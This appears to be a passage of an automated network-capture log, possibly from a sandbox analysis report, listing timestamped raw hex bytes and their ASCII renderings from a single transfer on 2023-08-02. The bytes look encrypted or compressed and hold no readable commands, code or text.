                                                          2023-08-02 08:16:22 UTC1007INData Raw: 20 f8 49 24 84 ea 6b 3c b6 e7 f8 6a 67 62 6d c8 f6 51 55 f3 5a ea 75 85 0d 32 2e c0 80 91 c6 fb 00 56 d2 51 25 ec eb ee 9d 65 46 ba 28 73 91 56 ea a3 a2 11 fe 15 a6 b6 6b 55 0b 5b 5f d8 e4 5f 45 ae 7b 2f a3 be c7 a0 21 2b 90 79 0e 26 d8 e9 76 ae 01 83 89 87 2e 2c 02 f7 fc 93 ae b0 cd 41 e6 90 76 9a 7f b7 ba 3c 6a d1 2d da f8 ee 1b 60 90 a0 af 99 b6 24 68 0d ed 5f d8 42 83 69 71 7b 94 2e 8f ba 32 46 a8 4f 10 f8 d6 3c 22 ca 3c 2c 26 8b 60 7d 5a 99 0b 07 4f 8b c7 db 66 52 82 a9 31 1e 2e b9 ea f9 b3 8c f5 78 33 c4 ef d6 6a 2a c8 3e 59 83 12 48 cc cd 97 c0 66 cb 46 13 3b 25 7d ef ff b6 08 1a ee 7d 1b 58 a3 1e 45 9b 90 1b 7f b1 eb 3a ca ad 01 44 51 b8 51 db 85 65 d7 89 d5 68 65 19 26 92 55 fb 8c 23 8a 0f 34 38 fc 84 d7 00 27 9e dc 90 df 9f 6b 29 ec 0f 96 9c a0
                                                          Data Ascii: I$k<jgbmQUZu2.VQ%eF(sVkU[__E{/!+y&v.,Av<j-`$h_Biq{.2FO<"<,&`}ZOfR1.x3j*>YHfF;%}}XE:DQQehe&U#48'k)
                                                          2023-08-02 08:16:22 UTC1023INData Raw: 9b e7 09 25 f4 ec 98 5b 73 de e9 61 63 74 45 52 67 8b d2 aa 7d 3a f5 77 d9 e3 22 d5 39 98 2f fc 4a 50 98 f2 92 cf 55 35 3d 2b 99 ad f1 c2 77 00 33 34 fe eb 1f 53 b4 f3 b5 8f 46 61 3f ff 10 31 66 1f 82 bf 26 8d aa 43 b8 ff b2 fb f2 67 c2 c0 cf 78 be 7f a3 22 bf 6a 2d 39 22 34 67 f1 56 c8 ca cc b0 cc 3b 7a 90 27 6c a3 04 16 75 f3 9c d6 98 f5 a9 81 70 05 d6 2f cc ef ea 9a be 42 1d 9f 0b 7f 1a 9f 92 10 51 79 8e a0 b5 e0 67 47 f1 07 e3 16 ec a6 33 dc be de d4 6b 9e 47 c4 71 f3 95 a7 1f 62 39 ff 54 e3 64 95 3a 88 ce f1 c6 ce 00 cf d4 fa ed 4f 88 0b 85 42 1b 48 6a a7 05 08 c1 a7 26 3c fc e0 30 17 b8 a6 b4 3e ae 5b 85 1e 57 89 7b 8e 51 9f 55 95 1f c5 94 e1 9c 75 0a 27 4d 2b f2 ee 32 58 ef 09 a5 76 00 fa b7 8b 5d 6c 9e 19 db 97 f1 11 23 4c 32 f4 7e 5c a8 9c 95 e7
                                                          Data Ascii: %[sactERg}:w"9/JPU5=+w34SFa?1f&Cgx"j-9"4gV;z'lup/BQygG3kGqb9Td:OBHj&<0>[W{QUu'M+2Xv]l#L2~\
                                                          2023-08-02 08:16:22 UTC1039INData Raw: d6 a6 1a 71 15 b1 0e f5 e9 8e bb cb 47 27 49 2b 95 96 fa 10 33 07 69 64 05 7e 5e e0 72 45 bd bb 93 f4 76 ee d2 d9 f0 85 da e0 60 55 99 61 cf 4f 09 36 82 87 2a bb 1d e0 90 0c f9 8e df 91 a8 60 f9 38 9f df 1b 9f 60 7a 4b 4c 7c 60 74 8e 18 1c d4 aa 20 d2 6b b7 ce 20 10 d3 94 5b c7 bc c6 69 c2 e4 41 b0 c6 a8 ae 49 fe e0 87 d4 13 ff 82 c8 dd 06 a0 12 72 03 e3 cf 11 d9 c0 cd 9b d5 d7 cd 7c dc b6 1b c5 c0 4e 11 66 32 20 27 ad 05 be 7f d2 a8 5b 10 7c 8a 0c 4d 98 d1 4b c5 0c 8c 74 53 35 7e 90 14 a9 48 b2 e2 55 dd 60 e6 32 14 d9 9f ad 27 16 fd fe 76 35 50 08 32 1f 45 1f f4 0a 0d 39 54 c8 69 d1 0e 37 ee f2 21 f4 e5 88 5c 7f 7c 70 c5 94 1e 9f 7a 4e 50 91 8f 68 2b f0 89 62 70 f0 1a e4 3d 85 db c2 ff 5c 37 94 b7 8c 17 96 28 11 10 be c5 76 96 c0 81 1a 7a ce 25 9c fb c3
                                                          Data Ascii: qG'I+3id~^rEv`UaO6*`8`zKL|`t k [iAIr|Nf2 '[|MKtS5~HU`2'v5P2E9Ti7!\|pzNPh+bp=\7(vz%
                                                          2023-08-02 08:16:22 UTC1055INData Raw: 4b c9 1f 89 b7 3e 4b 24 a5 0e d6 fd a0 f0 cb 38 10 33 26 98 67 32 bf 69 30 50 30 b7 dd 96 26 24 7f b7 ef b4 cb 27 4b c1 38 88 c6 85 bb 96 99 99 c2 4b 07 10 43 94 c5 fc d7 a2 10 0d f3 29 9e 73 5f ac 83 9c 53 6f ed 55 28 bd 70 2c 57 48 4f 8c b0 b8 c4 3c 6b 44 55 d8 68 e7 da d3 c5 c0 6b 74 9b ed 82 be 83 1e 57 43 69 46 58 6b a2 a8 4c d0 18 56 13 78 c1 cd d2 6b 70 a2 0d 0c fd f2 b6 38 95 8f 48 4c 62 70 07 d9 99 db c7 4e da 41 6d 69 32 c3 e5 da 06 fe f0 a2 3f 1e 1e 46 3d c1 7d d0 9a ee a2 db b5 26 24 f4 1f 16 67 ec e7 48 4b e2 b9 02 49 1f 82 b9 17 c6 31 f7 b7 75 b5 30 7f 21 94 87 05 b3 4c 97 91 58 09 e7 d9 41 ff ae ee 75 f3 a5 c5 52 c1 a5 16 da be a7 9c 10 26 15 fa ce d9 80 ff fb de b0 ca fe 77 d8 af a6 1d 61 76 f3 86 b5 37 c2 a3 b8 13 24 34 44 61 cc fc ed a0
                                                          Data Ascii: K>K$83&g2i0P0&$'K8KC)s_SoU(p,WHO<kDUhktWCiFXkLVxkp8HLbpNAmi2?F=}&$gHKI1u0!LXAuR&wav7$4Da
                                                          2023-08-02 08:16:22 UTC1071INData Raw: e2 81 11 8d 97 25 5d c1 f6 fa 06 0e 27 53 9e 1f d6 5d f5 82 7f d9 d8 5f 4f 5a d7 4d fc 0c 39 e4 af fa 54 52 0f 44 85 1b 0f c0 05 38 6d 70 58 46 c4 1e ee 3a e9 23 60 c3 4e 23 e9 91 4f 9d 9d d1 69 c4 de ef 12 73 57 92 af 85 2a 16 58 34 37 de 1b 8e 57 0a ae e2 84 f3 23 d4 09 18 87 06 41 aa f1 e6 a1 01 72 c6 11 7e 7a 73 a6 93 3d a8 7a 0d 33 61 f3 8e a8 52 f1 bc a2 5b 73 3a 8e ee 62 bc e6 c1 33 a5 b1 ea de 42 0f 78 80 ea e3 05 ee 57 e0 6e 6d 00 f7 c7 a5 f2 ae 74 50 f7 d8 30 24 17 ed d8 2f 5c d6 bf 4f f4 9a e6 be 33 63 5c 6b c0 2e 1f 74 43 10 48 94 33 8d a7 19 63 ce 7f c0 7e a1 5a 5a 90 fc 2c 85 38 90 c9 f2 af 2d a3 71 d5 87 9d aa 1d 74 2a 6a 80 27 e6 f8 e9 c3 90 31 b1 ee d5 9a 01 04 70 22 7e 04 d1 20 d9 a8 2d d6 41 8d de e8 d8 6a dc 03 9e 9f f8 eb 15 b6 43 2a
                                                          Data Ascii: %]'S]_OZM9TRD8mpXF:#`N#OisW*X47W#Ar~zs=z3aR[s:b3BxWnmtP0$/\O3c\k.tCH3c~ZZ,8-qt*j'1p"~ -AjC*
                                                          2023-08-02 08:16:22 UTC1087INData Raw: 55 df 92 82 2f 9d 1f 6e 61 04 99 26 2d 38 da a4 42 3f bf 80 db 22 81 01 75 a8 67 06 4f 8a 97 db 3d bd 70 6f bc ec 61 14 17 54 2a 9b 51 d9 96 4b 33 a0 16 17 f8 c9 d0 fd a3 20 47 25 88 6e 5e 00 a7 a9 de 40 67 c5 a8 9d 39 ba 10 ce 54 f3 2e d7 95 a3 a0 fb fa 03 39 df 13 3c f5 45 f3 16 1b 75 f3 9c 87 14 6d eb 24 fd f5 41 dd 3c 48 ab 18 95 5e ad 32 57 80 3c 88 72 a6 7e 0a da 99 2e 2e 27 cd f4 38 c3 b1 c9 b3 4f f7 fb 08 28 d5 4a b1 02 91 b8 2c bb 65 ab 58 56 f0 d5 b0 6a de 4d a1 f9 cc 01 12 14 7a 56 2e 14 de 22 37 be 40 b1 c6 11 e4 86 d0 a1 b6 9f 24 31 11 eb 3a c5 6d b1 58 8c 6b 90 ff 20 8d 50 c4 a8 c0 4a e6 36 ce ca 1b 4e dd f9 1b c5 ab 6d c7 5d fb fd 4e ff 50 dd 16 af 05 73 1d f5 9f 78 24 7c dd 47 6a 36 aa 6e 7d 6c 74 2b 72 d3 10 15 a1 13 26 40 ff 91 5a 8c c2
                                                          Data Ascii: U/na&-8B?"ugO=poaT*QK3 G%n^@g9T.9<Eum$A<H^2W<r~..'8O(J,eXVjMzV."7@$1:mXk PJ6Nm]NPsx$|Gj6n}lt+r&@Z
                                                          2023-08-02 08:16:22 UTC1103INData Raw: e9 9c 62 09 82 68 eb 6b db 7b 67 ea 38 3b f2 8c 2c 0b e7 a6 7f 12 09 94 36 d7 9a ef 16 a7 ce c3 4d fc b2 98 83 df 8f f2 dc 46 5d ac a5 48 80 04 71 96 91 6f 50 80 d6 11 e5 2f 68 a2 0a 5d 96 90 6e 1a 5b 4f 12 6e 06 7b d5 c0 65 be 8a 63 b2 5a 82 48 43 05 3f 2a 7a fb 0e b9 3d a1 03 80 fe 01 e1 f8 0b d7 39 2f 6d 89 2b 74 87 0d e1 be 73 73 27 86 2c fa 6d b6 fe a9 5f 87 17 74 13 fc a3 0a b0 e8 d0 6f d6 cc 91 29 b5 91 2a a5 f4 5e d1 58 fa 18 8b a4 2b 91 5d b6 ef 6d 73 e1 86 42 b8 d8 03 18 a8 0a f8 cc dc ed 4e 3d cb 4c 3e 24 17 ca 60 a0 23 8c 5f d1 95 84 0f 09 e0 32 ec d2 9c c9 fd 64 2a e9 f4 a9 c4 8e 3c b3 98 80 2e 39 c3 94 1a c3 d7 d3 eb 8d 26 27 f6 74 a6 fd ae 8c c1 cf 38 d9 9c 63 7e 26 57 80 90 b6 30 b2 06 b0 d4 b9 41 84 55 16 d3 92 e1 1f e8 19 a6 64 3d 35 4b
                                                          Data Ascii: bhk{g8;,6MF]HqoP/h]n[On{ecZHC?*z=9/m+tss',m_to)*^X+]msBN=L>$`#_2d*<.9&'t8c~&W0AUd=5K
                                                          2023-08-02 08:16:22 UTC1119INData Raw: fa 66 60 37 8d 13 88 f0 2e 77 48 32 62 94 ba 85 89 86 2f 51 a2 48 53 76 11 8a 97 89 a4 aa 9d 98 ec a7 4e 84 cc 8f 55 28 ed 71 d1 77 ba 9c 58 74 34 68 ac 4d 53 15 bd 0e 06 91 ff 74 09 78 da ff ea 3d 23 76 94 59 15 8b eb 0d 31 eb 1f f9 64 04 96 eb 98 1a 7f fa 28 36 30 e5 b3 6a fd b3 9e 25 e7 89 cc 04 06 b4 07 dd 5d 4c da a3 aa ca bc fd c2 f8 b4 a6 a1 65 38 47 f9 ca 62 98 90 0a 62 6d 71 14 3f a7 2d 2f 57 5f 1a 68 4d 64 89 1e a7 de 72 e8 7e fd f3 4b 03 10 ae 51 e4 2c 03 3b 97 97 31 f8 16 01 d7 cb 9d 39 fe 97 f5 eb 74 4d 01 74 60 c8 4d 3e 6b 34 a2 df 63 ed a5 51 8e 48 0c ed 99 4d 04 df 50 43 62 c1 9d a3 70 2d 44 cc f0 1b 65 02 d0 11 7f 77 b7 bb bd 53 86 27 6b 22 e7 62 1e 15 93 90 2e 1a 23 09 39 79 c0 19 7b 2a 72 6b 9d e7 61 b5 fb 3a 2d 2c 46 53 1f 09 21 70 24
                                                          Data Ascii: f`7.wH2b/QHSvNU(qwXt4hMStx=#vY1d(60j%]Le8Gbbmq?-/W_hMdr~KQ,;19tMt`M>k4cQHMPCbp-DewS'k"b.#9y{*rka:-,FS!p$
                                                          2023-08-02 08:16:22 UTC1135INData Raw: 42 a9 7f 37 9d 51 ce 90 d6 04 ac 5b e5 52 13 95 ef d8 5f fd 37 42 77 75 56 07 0d 51 29 32 80 be 6b e4 db b6 70 99 cb c2 5d b6 f4 6a e0 62 0f 42 7e 8e 08 88 92 bb 89 d6 da ef d7 cb 23 c4 bd f1 6b c3 a9 0c 2a 71 f8 22 94 a7 58 a0 e3 cc 0a 68 db d7 4c 53 62 43 46 82 d3 81 9d 5a 03 a9 ad 8d a8 72 d9 a9 7f d5 9e 36 a0 12 20 9f 51 75 6f 7d 30 c1 58 7d e8 10 df 4f 8d 59 49 33 31 56 e0 ed 65 e0 df be e0 f5 73 19 63 99 84 05 4b 3c 57 d6 eb e3 26 f9 62 db b0 9a 1f 09 e9 5e 8f ee 83 45 38 34 48 a6 a0 9e 48 cb d6 5a aa 2a ad d0 6f 79 ed 86 e0 43 fa 2c da e5 8e f4 62 90 43 a3 00 be eb cf 6d 8d 59 dd 09 7b 8e 7b 5b 04 9f fc 47 ae af 7c e3 70 06 f2 0d 8e 37 2f b9 73 41 b9 0a 25 f3 2c 07 32 77 18 d0 8a d7 2f 54 6a e0 77 f6 dd 0d 3a ed f5 66 4e 06 2c 5b bf 03 c7 29 77 ed
                                                          Data Ascii: B7Q[R_7BwuVQ)2kp]jbB~#k*q"XhLSbCFZr6 Quo}0X}OYI31VescK<W&b^E84HHZ*oyC,bCmY{{[G|p7/sA%,2w/Tjw:fN,[)w
                                                          2023-08-02 08:16:22 UTC1151INData Raw: d6 6d af 7f f0 47 f7 9f 96 89 51 3d ae c9 a1 b3 eb d9 a4 5c 6c 33 12 ce 5b 79 39 60 c8 46 fc 0e 20 5c ef 73 c8 15 b1 9f 39 cc cb 68 a9 90 4e 04 98 d7 c4 e1 d9 bc 04 1d a8 ca 6a fa 47 7e 2d c8 6f da 03 28 7c 54 8d db f3 8a 70 a9 a9 e2 da 59 01 bd e6 8b 79 d3 47 62 80 f6 60 66 20 45 4d 64 5e 99 01 0d 2a 21 09 67 e1 5f c6 4e 7a 41 9e 15 59 6a 84 f4 b8 37 e9 68 9a 19 bb 16 4b f6 35 b3 91 ec f0 db cd 62 3c 92 2b 39 03 19 1f e6 4b a6 bc 98 9f 51 12 67 0d 5f 98 15 27 3d 5b 92 98 77 1f a7 01 12 1d e2 76 2a 6c 63 95 ab fa 37 d4 f3 74 81 79 18 ef d7 c1 8f ef b7 65 c2 4e 29 05 0a 03 2a 67 0c 43 d4 4d df ec 8d 57 6e b5 2d 16 08 e5 ca 8f 55 e4 e9 5c 19 74 41 be f5 be b6 85 65 34 a5 84 f8 4b 52 ed b7 a8 d0 bf 1c be 10 b3 c3 ec 89 dc 19 9d dc 6f bc 6a 65 99 90 8b 3e 95
                                                          Data Ascii: mGQ=\l3[y9`F \s9hNjG~-o(|TpYyGb`f EMd^*!g_NzAYj7hK5b<+9KQg_'=[wv*lc7tyeN)*gCMWn-U\tAe4KRoje>
                                                          2023-08-02 08:16:22 UTC1167INData Raw: 2a d8 08 6c d5 df 20 b8 8a 7c a6 cf 9b 51 4e 8a 12 ac 08 cd 98 ce 87 73 e1 ed 15 e7 4b 28 99 7e 3e ce 92 b1 f7 12 1a a7 f8 c3 97 f2 53 88 ff bc 0b 05 e1 65 b3 04 67 7f ec c1 95 53 ea 2a 14 31 1d 55 05 49 a7 1e ec 0b 7f 01 4f 37 33 c0 69 f4 cc 69 2e b6 ff 3e cc 95 26 f3 5d 29 0a e0 1d 70 c6 f1 27 07 f3 f8 af 9b 7b 72 a6 63 70 34 ac b6 ca c6 97 ad e3 49 b4 9e ae c5 97 bc 7b 3e a2 f8 c9 63 ea 9b b6 51 27 64 a2 98 cf d8 97 6a c9 a1 ce d0 33 79 60 17 5d 14 4f c1 de b2 1c 5b 3f 56 60 2c 45 b9 f0 19 3a 5d fa cb c6 22 5f 94 88 50 a2 2e e0 19 91 f0 53 aa 9b 3b 1b 7e ba 29 25 82 3a a1 c7 4c 1e e8 2f 09 f0 71 0f 8f cc bd 70 f6 b9 af 44 f6 b6 8d 4e 69 f2 b8 20 fc b0 4d c9 bc c5 2c 48 67 84 54 de 77 03 65 8d 34 dd 5d 52 c1 e2 5b 0e bf 97 5a c9 93 a0 b1 d6 f7 55 10 a7
                                                          Data Ascii: *l |QNsK(~>SegS*1UIO73ii.>&])p'{rcp4I{>cQ'dj3y`]O[?V`,E:]"_P.S;~)%:L/qpDNi M,HgTwe4]R[ZU
                                                          2023-08-02 08:16:22 UTC1183INData Raw: 0b b1 33 3a aa 89 e4 52 3e 33 eb c6 40 b5 f8 31 2d b6 e7 4b 7c 2e cf da 60 55 6f 8a 43 cb da 34 f8 9c 21 f0 8c 51 ab 6f f2 a8 65 45 eb 8e 2b 84 bc 8c 22 85 67 0d 1a 60 87 ad b2 f7 ac 95 ac fd 48 76 e2 8c 25 e0 36 b6 41 de 5c e2 24 12 7c 3d 7b 50 e6 dd c6 b6 2e d0 c9 c4 ff b2 68 f1 e9 1b e3 74 7c 91 1d d4 69 15 e3 20 fc a0 c4 1d 6a da 78 73 f1 56 a5 f8 9f 7d c8 dc 51 5e 45 d0 c5 dc da 9d 68 5a f7 5b bf e1 e6 d5 d5 62 65 a6 7f 5b 85 24 a9 9e 2b 83 84 95 82 20 41 a8 16 d1 2c a9 83 89 1c c1 6a 48 21 1e 10 60 d1 be f6 75 b9 55 66 26 a1 83 d1 72 b9 6d fd 84 2b 97 86 6d a8 a6 f7 58 51 5a d1 c5 e5 34 39 5f ae 8e 0e 3a a6 c6 99 21 39 ea 1e 6c 19 6f 68 22 8f ba ea 4c 5b 0c d0 7c 15 fc 00 8a 1d ac d7 2c dd 90 7f 3c d9 dc d8 e9 8f 6a 07 d6 d8 cf b8 d3 6c f7 65 6f f4
                                                          Data Ascii: 3:R>3@1-K|.`UoC4!QoeE+"g`Hv%6A\$|={P.ht|i jxsV}Q^EhZ[be[$+ A,jH!`uUf&rm+mXQZ49_:!9loh"L[|,<jleo
                                                          2023-08-02 08:16:22 UTC1199INData Raw: bd a1 b1 61 72 4e f1 8a ac 54 34 d9 be 7a 84 b6 1b ed 49 5a 01 ce a1 f7 8e 06 c4 3d 01 fb 0f cf 22 c2 16 0c 8e 14 7e d2 fc 90 5b 38 eb 14 4f 83 96 ab 16 6b 58 a1 f8 e6 6d 19 45 31 1f 4a 93 4d fa 64 ef 4e 30 f5 af 19 22 24 73 6b 46 69 53 b0 5c cb 20 ba fe e1 37 1c ed db b0 c5 b7 64 38 eb 78 2a ec 05 73 fb b8 79 1e 8a 4f 56 b2 7e 7b eb 59 81 a3 ec 7b 8d a4 69 66 dc 9a ac 33 9d d0 2b ac 6f f1 94 e7 00 42 63 f0 92 1b f4 bb 57 a2 ea b8 62 9f d3 2e 50 b1 00 48 93 4a ec 50 b2 dc 76 22 0f 08 c8 a3 f7 25 5d 03 60 2c f1 de b7 36 3d 66 90 5c b3 03 bd 4a 31 35 b5 b3 6c 5b 92 41 8c 07 0d 84 2b 38 96 aa 73 da a8 94 8b 01 a5 d0 eb 44 07 b1 8f a2 87 d1 f8 bd a0 c2 fe cf 79 c7 af 12 24 67 42 bd 55 9f d4 ab 31 d8 76 52 70 3d ff 97 a8 a5 40 c1 00 74 56 19 5a 66 8a 98 14 a7
                                                          Data Ascii: arNT4zIZ="~[8OkXmE1JMdN0"$skFiS\ 7d8x*syOV~{Y{if3+oBcWb.PHJPv"%]`,6=f\J15l[A+8sDy$gBU1vRp=@tVZf
                                                          2023-08-02 08:16:22 UTC1215INData Raw: 1b 52 c9 cf 45 b8 9d ce 30 14 22 53 44 3e 44 1a 1e 71 9f f5 56 4a 92 25 30 e6 88 c3 a8 33 6f 1a 61 a5 3c 5c 3a bc 82 24 0c 1f 3f d1 79 91 12 1b c5 dc dc 36 8b 4f 37 9b ca 5d b1 1e cb f8 d5 36 20 ba 96 3b ca 40 5c 52 03 a6 54 e1 0e 86 fb 8d 43 c9 2e a9 4a 61 11 48 7d 0f 09 b7 6f 26 9a f0 59 b1 12 2a 93 d9 15 49 cb fa 8d e6 55 bb 9e 05 ba a2 6b c7 1d 1d d8 24 a3 31 34 5a 4f a9 bd 17 6e da db 16 17 3b 57 0d f6 e4 a5 73 50 9e c2 b4 13 6c 86 6f c6 88 ac 2e 0b 8b 92 87 a4 8e bf ef 3d 64 29 37 cb f6 74 6d 3b 1a 26 a2 de e3 21 00 77 1b e5 76 d2 81 07 10 90 2e 89 14 1b 37 c0 f9 23 38 85 79 1f b3 f3 50 18 67 2f c2 34 5e 93 bb c3 4d 1b d2 d3 91 ae 3a 69 46 02 e6 54 d3 d7 7d fb 62 76 7d 0d e5 3e f8 de aa 03 93 ab 23 66 f6 3e 30 dd 9e ab 5e 74 26 ce cf 96 4a 0d f0 62
                                                          Data Ascii: RE0"SD>DqVJ%03oa<\:$?y6O7]6 ;@\RTC.JaH}o&Y*IUk$14ZOn;WsPlo.=d)7tm;&!wv.7#8yPg/4^M:iFT}bv}>#f>0^t&Jb
                                                          2023-08-02 08:16:22 UTC1231INData Raw: ce d6 d0 a6 40 65 44 26 c4 fc f4 8d 3e 56 dc 25 48 eb 66 9d e6 74 32 56 33 0d 2d 38 01 f0 ee ae 55 ad 8b 59 d4 66 9c 91 55 6a a3 d4 79 0f c7 4f c0 40 30 f8 3b 94 61 e8 93 b7 bb d0 d1 7b 48 bd 3f 59 8f e5 a4 31 c4 08 75 27 9f b3 22 fd 9d c8 45 9c 23 40 11 a9 f2 e7 06 74 76 cf b6 0b f9 ea 6e 3b cc 1f 64 58 47 91 d6 8b 37 ff 19 cd 2e 01 90 ee ae f5 f7 b1 38 6a 58 e7 a5 74 02 54 85 3e 2f c5 61 73 06 5c bf e7 31 de 0b 85 5b 26 bf da 0a 6e 03 ce 78 24 5b 6c aa f6 a6 35 3f a3 f2 23 fa 71 34 7e bb 2e d0 5c 1b aa c6 e9 05 4a c8 dd d0 97 03 2d db fb aa 53 d3 80 84 cd 6b 99 b1 5f 0d d2 ee 8e 95 1c 4f c7 8e 57 83 01 9c 15 f8 88 99 f8 88 39 29 dd d0 66 c8 bb 7b 1d 35 e8 11 42 07 5d 2f 01 8d 18 11 8a 47 3f 40 ba d0 1c b5 f8 01 59 9a 19 06 1d 6b 05 2a 22 80 92 50 1d 24
                                                          Data Ascii: @eD&>V%Hft2V3-8UYfUjyO@0;a{H?Y1u'"E#@tvn;dXG7.8jXtT>/as\1[&nx$[l5?#q4~.\J-Sk_OW9)f{5B]/G?@Yk*"P$
                                                          2023-08-02 08:16:22 UTC1247INData Raw: f3 95 c5 c5 19 66 91 a1 48 81 f9 3b fe 15 c3 0f c6 e3 2b ae a7 3b 14 92 bb 2b f6 05 73 76 c1 aa 1f fd 72 c9 ff ac db 33 8e 82 8d 1f 3d 81 46 f6 53 1d 98 1b 6a ff d9 89 12 a6 dd 8f 9b d1 2f 0a 89 cc c6 32 b9 02 11 4c fb 80 c6 d6 7b 48 5a ce 8d 2a 40 08 06 53 68 14 72 a0 88 07 00 c1 f8 65 16 76 b7 10 39 5b 2a 79 b1 f0 a9 05 b6 b0 b3 ae e9 5a d2 de 81 ca 97 ba ce c1 60 a8 48 7f 0e eb 16 72 7f d3 89 0e 5c cb 06 c8 88 3a cf fd 17 2d e5 d5 a3 3f e3 8c c1 12 80 49 15 65 79 8b d5 a5 b6 0d 34 b0 d4 06 16 02 fd 06 be 62 e2 f3 a9 c7 05 e8 69 9c fc 15 d1 65 ef 7d 98 71 f9 f1 35 b9 32 48 22 88 82 71 80 d3 8a 31 2a b1 5d 58 82 96 87 8b 8c 8c 24 b5 ea 0e 10 4c 2c 2f 15 51 bf 86 8e d8 98 bd e4 0a 0a cc 07 70 3c 79 c0 fd be ba 8d f2 dc fa 30 5c 70 c7 7d a2 4b 03 d3 73 b7
                                                          Data Ascii: fH;+;+svr3=FSj/2L{HZ*@Shrev9[*yZ`Hr\:-?Iey4bie}q52H"q1*]X$L,/Qp<y0\p}Ks
                                                          2023-08-02 08:16:22 UTC1263INData Raw: fa d9 6e 87 28 2f 8d a1 4d d1 b9 52 e9 c7 1a 63 6f a7 55 7a 71 61 2d 04 4d ec 0e d5 09 b7 a5 52 86 2f 0c ac bd 34 03 27 85 5d 6b 10 41 ed a8 7e 70 80 31 99 a2 1d 41 85 f0 f4 df ef 82 66 8d 94 3f 25 e0 65 de 0d 32 ee 66 51 cf 48 79 5e e5 e4 ae 86 66 a4 8e b5 1b 00 10 6e de b8 74 0b 2b 7d 1a 69 3a 49 20 4b 77 02 2f ba 92 3c 40 6a 27 dd 11 b7 e0 f6 89 9f b5 0b 58 4b 2f ab 22 27 ac a7 74 70 2d 21 da 47 5c 2b 64 d4 68 80 6f da 05 b7 bf 4d 8b dc 97 c7 f9 38 bf 14 0c 1f 85 30 69 10 0a dd 65 0c 9f 22 ac d7 ac a3 55 33 c0 ed d5 04 ed be 03 64 99 45 1c ea 07 27 60 fc 8b 43 8b 1a ac 86 07 3d d8 b1 e7 6e 2d db 9e 18 49 45 43 d4 5e 0c 06 5f 52 d3 cb 22 fb fe 0b 16 c0 53 18 b2 da 01 fa 3e 25 62 96 70 aa b8 6d 95 c5 38 57 1b 20 88 0f 79 e6 8e aa 77 75 6b 66 44 c3 ab dc
                                                          Data Ascii: n(/MRcoUzqa-MR/4']kA~p1Af?%e2fQHy^fnt+}i:I Kw/<@j'XK/"'tp-!G\+dhoM80ie"U3dE'`C=n-IEC^_R"S>%bpm8W ywukfD
                                                          2023-08-02 08:16:22 UTC1279INData Raw: e7 48 59 c8 3c f9 a7 d9 e4 08 84 9c 3e 63 57 64 90 a5 71 11 2e c0 32 e8 8a 49 da 58 8e f3 1e 56 d7 f7 c6 88 de ab 1a 81 f0 fa 23 95 cf d9 85 8b 87 6d 4d 2c 2f 67 a6 46 b6 cf 7a 5f f6 21 3a 0b 0b f4 16 66 60 c2 e3 e5 5a cf df 54 fb 45 22 ac 82 a3 47 7a 74 fd e1 f8 a7 1a 00 56 5d 19 bc fe e1 f3 84 cf fc 0a 75 c1 f3 d1 ad 04 90 e1 2d 76 0f 74 4c 4f 13 81 b6 bf 57 79 26 36 d9 d3 c0 48 2d 7f 57 73 ce 90 23 81 9f 73 6c 52 a6 da f4 fd 6d 81 36 e7 34 6e 14 b9 1f b3 2a 7b 82 da 31 ff 17 0a 5e b7 17 dd f9 71 83 79 24 54 6c cd 00 a1 44 89 cd f5 1c 1d 94 fb 6b 06 b9 c1 9b b8 e7 0e 5b 14 40 d9 2f 3f 78 1b 54 77 1f 65 dd 2e 2a 4c d6 6d 3b 5e 05 88 fa 94 b5 1f c6 b8 91 da 9b 40 7f b2 72 44 ee 56 1a d8 23 a1 92 8f d6 e9 69 cc ca ea 1a 94 16 89 fa 1f 3d a9 cb bb 6d 1a 5c
                                                          Data Ascii: HY<>cWdq.2IXV#mM,/gFz_!:f`ZTE"GztV]u-vtLOWy&6H-Ws#slRm64n*{1^qy$TlDk[@/?xTwe.*Lm;^@rDV#i=m\
                                                          2023-08-02 08:16:22 UTC1295INData Raw: e2 92 ef f2 82 35 21 f4 f1 da 0f 00 65 b7 d8 8f 06 74 cc b7 28 ae 45 5b c2 9f ae d8 bd 4a c6 26 ec 49 68 9c 51 4f e0 a1 62 54 10 bf 2b 96 f8 39 20 69 f5 1f 47 d1 ca c2 3b 4b 69 9b c8 8e c3 80 21 2e 14 b8 bc 87 70 68 01 d3 ed f9 c0 54 1c df 10 cd 92 0f b2 6c 20 63 72 a4 92 d8 64 b2 5f fa db 33 59 d2 47 3e 03 04 ac 6c ac b5 c1 e3 5e 09 c2 35 f9 d2 22 c6 81 f9 47 45 d6 69 c6 0c 41 4f 9b 16 61 e2 4b ea 1d ab 7c 8b 1c 9d e7 e1 e6 be 88 33 2b 33 4a ed 45 a9 15 42 00 7a f4 74 bf 5d 13 39 17 b8 7b fb 15 42 9a 92 b2 0d 60 97 50 cf 90 8b 0a 18 42 84 ee 76 53 99 8c 45 af e4 55 37 bc c7 2e 71 1b fc 27 03 a5 86 f4 97 b7 61 09 a7 18 12 ca db 17 73 13 b1 0a 37 0a 7d 8c a9 b2 59 2c ef b5 bc 0a a5 5b ca 44 bc 1b 31 14 18 c1 ab c5 e2 03 19 39 b0 ca df 2a 09 7d 07 44 58 bf
                                                          Data Ascii: 5!et(E[J&IhQObT+9 iG;Ki!.phTl crd_3YG>l^5"GEiAOaK|3+3JEBzt]9{B`PBvSEU7.q'as7}Y,[D19*}DX
                                                          2023-08-02 08:16:22 UTC1311INData Raw: 47 ac f2 bb 12 39 2d 18 49 61 84 29 32 d7 76 cc 5c bf 27 12 d3 63 32 8b 86 9b b6 f9 f1 30 77 e3 f9 31 6e 4a 05 31 26 6d 0d 95 41 bd b3 69 88 cb a0 d5 be 9a 71 2b 13 bf 5e 63 8c b4 e2 46 32 c3 17 6d 43 f9 b8 c4 75 a0 42 50 cd c3 a3 51 bc 4b f8 d3 7c 45 07 7a b1 d4 25 77 c2 f3 29 fd 82 a3 82 1d 29 51 bf ba 47 9e 69 85 a8 4a d4 ca 50 41 d0 8a e8 40 a8 d3 68 18 98 1a 61 4e c4 17 cc 8e fd 1b 76 95 00 96 30 03 b5 6d 4d 33 3b aa ac d3 a2 95 ee 38 a5 74 9c 5e 08 50 61 36 6d e0 0f 8c 84 81 ae e3 12 2c 88 d8 69 2c 6f bf 53 d6 32 86 3a 4b 7f 6a 1f 1b ae 30 e5 39 df 6c 68 64 89 b5 b9 df 9e a3 58 63 73 82 84 8f bf 6b 10 09 7a 39 6c 52 d4 02 1b 7f c9 33 84 8b 09 bc 12 21 55 82 13 fd e6 ee 5e 2f 15 c1 9c 8b 78 af 4c e5 e4 c9 35 9d 3a a6 1c 0a 61 3b 42 84 9b 80 89 ae bd
